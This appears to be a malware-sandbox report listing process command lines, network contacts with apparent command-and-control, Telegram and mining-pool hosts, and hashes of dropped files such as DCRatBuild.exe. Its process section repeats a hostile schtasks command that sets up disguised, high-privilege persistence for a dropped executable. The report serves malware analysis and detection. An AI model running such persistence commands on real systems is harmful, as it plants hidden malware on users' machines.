"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.nodejs.org | udp |
| US | 104.20.22.46:443 | www.nodejs.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | aka.ms | udp |
| DE | 104.119.110.121:443 | aka.ms | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | article-coal.gl.at.ply.gg | udp |
| US | 147.185.221.21:27263 | article-coal.gl.at.ply.gg | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.21:27263 | article-coal.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | papka.top | udp |
| US | 172.67.169.72:80 | papka.top | tcp |
| US | 172.67.169.72:80 | papka.top | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| FI | 77.105.133.52:80 | 729231cm.n9shteam1.top | tcp |
| FI | 77.105.133.52:80 | 729231cm.n9shteam1.top | tcp |
| US | 8.8.8.8:53 | ozero.top | udp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| FI | 77.105.133.52:80 | 729231cm.n9shteam1.top | tcp |
| US | 8.8.8.8:53 | ozero.top | udp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
| US | 8.8.8.8:53 | article-coal.gl.at.ply.gg | udp |
| US | 147.185.221.21:27263 | article-coal.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| FI | 77.105.133.52:80 | 729231cm.n9shteam1.top | tcp |
| US | 8.8.8.8:53 | ozero.top | udp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| FI | 77.105.133.52:80 | 729231cm.n9shteam1.top | tcp |
| US | 8.8.8.8:53 | ozero.top | udp |
| FI | 77.105.133.52:80 | ozero.top | tcp |
Files
\Users\Admin\AppData\Local\Temp\Youtube.exe
| MD5 | d25ebdfc04bdadea74017fa72f90781f |
| SHA1 | f7278c4d04fc4db888368e0245d7607d8bcbb557 |
| SHA256 | 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f |
| SHA512 | 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71 |
C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
| MD5 | 54276fc2dfafc0b610f08ba739a0f5ee |
| SHA1 | dc61f3b768f2b1423c949d0ce761606f594aee8c |
| SHA256 | 9bb53f37a4b196c0031047936fbf6f029aa845d4610e77cabed1d370f04f229b |
| SHA512 | 9d5ed9cab660d270e4749d51bc4aefd251c64e6bd90fe70588668002522ac00148a33f03a1127141772f42c7e7a0510b3218a89e9e1209836cebb3371dbceb22 |
memory/2756-18-0x0000000000400000-0x0000000000D8F000-memory.dmp
memory/2736-21-0x00000000002B0000-0x0000000000330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Result.exe
| MD5 | 170b43350048ed4b6fca0e50a0178621 |
| SHA1 | db863b7b04a7c58baa9120e2f184517ed27a7252 |
| SHA256 | 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b |
| SHA512 | e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7 |
\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
| MD5 | 7529e4004c0fe742df146464e6aeadb0 |
| SHA1 | ae7341ee066b31de5a1a1a25851b70ced41de13f |
| SHA256 | a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81 |
| SHA512 | d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27 |
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 36b62ba7d1b5e149a2c297f11e0417ee |
| SHA1 | ce1b828476274375e632542c4842a6b002955603 |
| SHA256 | 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c |
| SHA512 | fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94 |
\Users\Admin\AppData\Local\Temp\solara.exe
| MD5 | 1797c0e37f4b9dd408cbf0d7bfcb7c95 |
| SHA1 | 10df695351ac6074e23a3d3b4bd31a17c10fd614 |
| SHA256 | 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb |
| SHA512 | 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1 |
C:\winNet\we9fgyC144zVOkGk.vbe
| MD5 | aa1a085aba94a5fc38c26b79a2217336 |
| SHA1 | f847af2aec7fd56fe8734ccb51d8027b9b4e817b |
| SHA256 | f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545 |
| SHA512 | 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981 |
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe
| MD5 | 1a3448b944b91cebda73adc5064e6286 |
| SHA1 | 4f8716c6e56a675944a5f0f250947c8d45a362e1 |
| SHA256 | 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5 |
| SHA512 | b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795 |
C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe
| MD5 | 3492e48fb2e9fb2bfc18658e3d8f88bd |
| SHA1 | 34cec8222aedc8baf774aa863a041a23971c7631 |
| SHA256 | c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e |
| SHA512 | a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9 |
memory/2272-101-0x0000000000AE0000-0x0000000000BAE000-memory.dmp
memory/2544-72-0x0000000000400000-0x000000000069B000-memory.dmp
\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
| MD5 | 7d4b84a8c3d14cb3d1bb864719463404 |
| SHA1 | 544cf51aec717c63552f0fdf97d364b1b62a7a0c |
| SHA256 | 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663 |
| SHA512 | d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29 |
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat
| MD5 | 83a7f739f51f1acd83f143afa6ec1533 |
| SHA1 | 2f653f906842f8f507d02f81550eb26a35f38acc |
| SHA256 | 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545 |
| SHA512 | c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793 |
memory/2124-107-0x0000000000350000-0x00000000004D4000-memory.dmp
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
| MD5 | 9cf4017a8383ae846a908c79a28354bf |
| SHA1 | adbe6a02b90147431e80fc38100de42d88dd765a |
| SHA256 | bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2 |
| SHA512 | 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00 |
memory/2692-68-0x0000000000400000-0x0000000000CC7000-memory.dmp
\Users\Admin\AppData\Local\Temp\Frage build.exe
| MD5 | 11fdce42422f8ed518fedf290f5bfc3c |
| SHA1 | f18a4ad694af5ba50a7697b4cb66308454c555d9 |
| SHA256 | b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3 |
| SHA512 | 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae |
memory/2124-108-0x0000000000340000-0x000000000034E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab408B.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2124-143-0x0000000000630000-0x000000000064C000-memory.dmp
memory/2124-146-0x0000000000680000-0x0000000000690000-memory.dmp
memory/2124-145-0x0000000000650000-0x0000000000666000-memory.dmp
memory/2124-144-0x0000000000610000-0x0000000000618000-memory.dmp
memory/2124-147-0x0000000002040000-0x000000000204E000-memory.dmp
memory/2124-148-0x0000000000690000-0x000000000069E000-memory.dmp
memory/2124-149-0x0000000002050000-0x000000000205A000-memory.dmp
memory/2124-150-0x0000000002060000-0x000000000206C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a4d3147a3951e32147bb6e429507b1d4 |
| SHA1 | d9a9d6b087291748c13efbcb348979669371893f |
| SHA256 | 8d3d64cd2422465d718db5d9e1f97729a1c40d6c44e7f71bc7efd7fd36ae1169 |
| SHA512 | 20a64f3d3ebb111f8ccb2da41399bb275f8b54aae94c519885b7ccbe9cdf9239a36a9cdc10319a1ac6f69ad26ec24853a04fe96dca975cc670b352b0c977137d |
memory/788-214-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
memory/788-207-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat
| MD5 | 23d7f0db9072a4d28ffe70683fb821e4 |
| SHA1 | 3511edb43b2980a34547c849637bd62a1e12d00d |
| SHA256 | 8b9f273dbc2d046ade270d0512bb5d56a620aba4fbada4653aeecb39d3d89d36 |
| SHA512 | d2b3f01aa0219a08ccaa4e866bc2fa4f710d34eee1baa88fd508fe1ef8580569a6f40f33c5326ca5c01b9dc3a0fde6940418d8a349b90845a6388db98a8b24a8 |
C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi
| MD5 | 0e4e9aa41d24221b29b19ba96c1a64d0 |
| SHA1 | 231ade3d5a586c0eb4441c8dbfe9007dc26b2872 |
| SHA256 | 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d |
| SHA512 | e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c386aa946df6b1370164ccccf55e450 |
| SHA1 | 6b12a199e37e50fc9f0e65076a21456a73b64e62 |
| SHA256 | 97d83f928d6eb1d28481daeec317b7b1f0c0121ea6bdc0f40396186c9fcfff9f |
| SHA512 | bfe9c89a638b7503605f386ae0985b68fd0ff8d985b9d62d9270ed5f9330be772e32681310a7060e3defe5d5bc1afd5a3a1763246f96c520490475e18953cf99 |
C:\Windows\Installer\MSI58FF.tmp
| MD5 | 9fe9b0ecaea0324ad99036a91db03ebb |
| SHA1 | 144068c64ec06fc08eadfcca0a014a44b95bb908 |
| SHA256 | e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9 |
| SHA512 | 906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176 |
memory/484-301-0x0000000001110000-0x0000000001294000-memory.dmp
memory/2448-302-0x0000000000210000-0x0000000000431000-memory.dmp
memory/2448-305-0x000000001B3D0000-0x000000001B5F0000-memory.dmp
memory/1520-306-0x00000000FFF20000-0x00000000FFF68000-memory.dmp
memory/2128-313-0x000000001B850000-0x000000001BB32000-memory.dmp
memory/1520-315-0x00000000FFF20000-0x00000000FFF68000-memory.dmp
memory/2128-314-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2556-324-0x000000001B550000-0x000000001B832000-memory.dmp
memory/2148-397-0x00000000002E0000-0x0000000000476000-memory.dmp
C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe
| MD5 | e41ef428aaa4841f258a38dc1cc305ef |
| SHA1 | edf3a17831e013b74479e2e635b8cf0c1b3787ce |
| SHA256 | 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995 |
| SHA512 | a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd |
memory/560-413-0x0000000000C70000-0x0000000000E4A000-memory.dmp
memory/560-415-0x0000000000190000-0x000000000019E000-memory.dmp
memory/560-417-0x00000000001A0000-0x00000000001BC000-memory.dmp
memory/560-419-0x00000000001C0000-0x00000000001D8000-memory.dmp
memory/560-421-0x00000000001E0000-0x00000000001EC000-memory.dmp
memory/2524-569-0x000000001B690000-0x000000001B972000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1WQDCN01NHEORDRND4P4.temp
| MD5 | 8ae55f9fe359e97ef3ef9f98a44e7a1e |
| SHA1 | 72dd9197cb278388f8c97bb55788a636bba89315 |
| SHA256 | 8adb49c9b85dc5d4ce2609eeedc257cce6709407a9e34e318b88ba576a02640e |
| SHA512 | 9be3b911f70d656716cb7a9bfcd3e2216539c308a95f6decd440ce0f62795f1a09571032421320fdd0645776dbfaf8ce4214bebc4296ae9a0c5d64ed02e52c0e |
memory/2760-667-0x000007FEF2090000-0x000007FEF20B2000-memory.dmp
memory/2096-668-0x000007FEF2090000-0x000007FEF20B2000-memory.dmp
memory/1972-674-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2292-677-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2044-678-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/916-679-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1900-682-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2644-683-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2212-684-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2248-687-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2148-688-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1664-691-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2588-692-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2900-695-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1436-697-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2196-696-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1380-700-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2844-701-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1852-702-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2340-703-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1760-706-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1520-707-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2220-710-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1400-711-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/3020-713-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2960-712-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2468-716-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2880-719-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2528-722-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2372-723-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1944-724-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1064-727-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/3068-728-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1616-729-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1460-732-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2792-733-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2236-734-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1904-735-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1160-736-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2596-741-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1148-740-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1856-743-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1256-742-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2308-753-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1860-759-0x0000000001E70000-0x0000000001E78000-memory.dmp
memory/2412-758-0x000000001B7B0000-0x000000001BA92000-memory.dmp
memory/2248-769-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2620-768-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2788-771-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1852-772-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1860-790-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2100-791-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2368-860-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2004-859-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1640-845-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2068-844-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2452-831-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2580-852-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2112-855-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2328-854-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/2412-851-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp
memory/1708-867-0x0000000000140000-0x0000000000148000-memory.dmp
memory/1820-871-0x0000000000060000-0x00000000001F6000-memory.dmp
memory/1860-870-0x0000000001080000-0x000000000125A000-memory.dmp
memory/1544-927-0x0000000000360000-0x00000000004E4000-memory.dmp
memory/1708-995-0x0000000000A20000-0x0000000000BB6000-memory.dmp
memory/2736-997-0x00000000004D0000-0x00000000004DC000-memory.dmp
memory/2900-1252-0x00000000001F0000-0x00000000001F6000-memory.dmp
memory/2132-3290-0x00000000000F0000-0x00000000000F8000-memory.dmp
memory/2412-3850-0x0000000000CB0000-0x0000000000CB8000-memory.dmp
memory/1428-4033-0x0000000000D30000-0x0000000000EB4000-memory.dmp
memory/2692-4456-0x0000000000250000-0x00000000003D4000-memory.dmp
memory/1828-5044-0x0000000001000000-0x0000000001184000-memory.dmp
memory/2988-5045-0x0000000001200000-0x0000000001384000-memory.dmp
memory/1688-5608-0x0000000000C90000-0x0000000000C98000-memory.dmp
memory/904-5610-0x00000000011B0000-0x00000000011B8000-memory.dmp
memory/3024-5609-0x0000000000C20000-0x0000000000C28000-memory.dmp
memory/2248-5763-0x0000000000BC0000-0x0000000000D44000-memory.dmp
memory/1748-5897-0x0000000000D40000-0x0000000000EC4000-memory.dmp
memory/964-5933-0x0000000000270000-0x00000000003F4000-memory.dmp
memory/1664-6190-0x0000000001360000-0x0000000001368000-memory.dmp
memory/304-6191-0x0000000000280000-0x0000000000404000-memory.dmp
memory/2832-6774-0x0000000001210000-0x0000000001394000-memory.dmp
memory/2880-7333-0x0000000000F40000-0x00000000010C4000-memory.dmp
memory/2192-7361-0x0000000000CF0000-0x0000000000CF8000-memory.dmp
memory/1012-7365-0x0000000000D00000-0x0000000000E84000-memory.dmp
memory/2416-7547-0x0000000000EB0000-0x0000000001034000-memory.dmp
memory/2300-7936-0x0000000001120000-0x00000000012A4000-memory.dmp
memory/2908-7940-0x00000000001C0000-0x0000000000344000-memory.dmp
memory/1656-7941-0x0000000000030000-0x0000000000038000-memory.dmp
memory/2076-8124-0x0000000000E40000-0x0000000000FC4000-memory.dmp
memory/304-8513-0x0000000000FE0000-0x0000000000FE8000-memory.dmp
memory/1224-8514-0x00000000000B0000-0x0000000000234000-memory.dmp
memory/184-8519-0x0000000000210000-0x0000000000218000-memory.dmp
memory/996-8698-0x0000000000E10000-0x0000000000F94000-memory.dmp
memory/820-8748-0x00000000008E0000-0x0000000000A64000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\eugwdvhdxi
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\Users\Admin\AppData\Local\Temp\ExtE3IRK6T
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\CWltOzyXb2
| MD5 | 4a1a8aca865134d079146e4ecf2fd4b3 |
| SHA1 | 46756ac1d44b35ac30292f85388d03be5d63ef2f |
| SHA256 | 205039e56bf51a20bf5a068d2acbf3c6da57b7ec665a7305d63bbad4955d6dcc |
| SHA512 | 8bb23a2c82271b3bf5d638668d4a7c5baaf8b345b378eaaddf298f301a719622154dc400c475c90e5f7fc84c877fb68a75aefb3bed1aa77f2222d29823baf009 |
memory/2176-9120-0x0000000000370000-0x000000000054A000-memory.dmp
memory/2228-9195-0x00000000003E0000-0x0000000000564000-memory.dmp
memory/1472-9198-0x00000000001C0000-0x00000000001C8000-memory.dmp
memory/2724-10888-0x0000000001040000-0x0000000001048000-memory.dmp
memory/1940-10890-0x0000000000280000-0x0000000000288000-memory.dmp
memory/1164-10889-0x0000000000FE0000-0x0000000000FE8000-memory.dmp
memory/2096-10904-0x0000000000260000-0x0000000000268000-memory.dmp
memory/1932-11064-0x0000000000CF0000-0x0000000000E74000-memory.dmp
memory/2260-11065-0x00000000009C0000-0x0000000000B44000-memory.dmp
memory/928-11076-0x00000000000E0000-0x0000000000264000-memory.dmp
memory/2384-11122-0x0000000000090000-0x0000000000214000-memory.dmp
memory/1916-11487-0x0000000000ED0000-0x0000000001054000-memory.dmp
memory/1528-11489-0x00000000012B0000-0x0000000001434000-memory.dmp
memory/552-12065-0x0000000001200000-0x0000000001208000-memory.dmp
memory/1012-13197-0x00000000011D0000-0x0000000001354000-memory.dmp
memory/596-13775-0x00000000001E0000-0x0000000000364000-memory.dmp
memory/852-14927-0x0000000000C20000-0x0000000000DA4000-memory.dmp
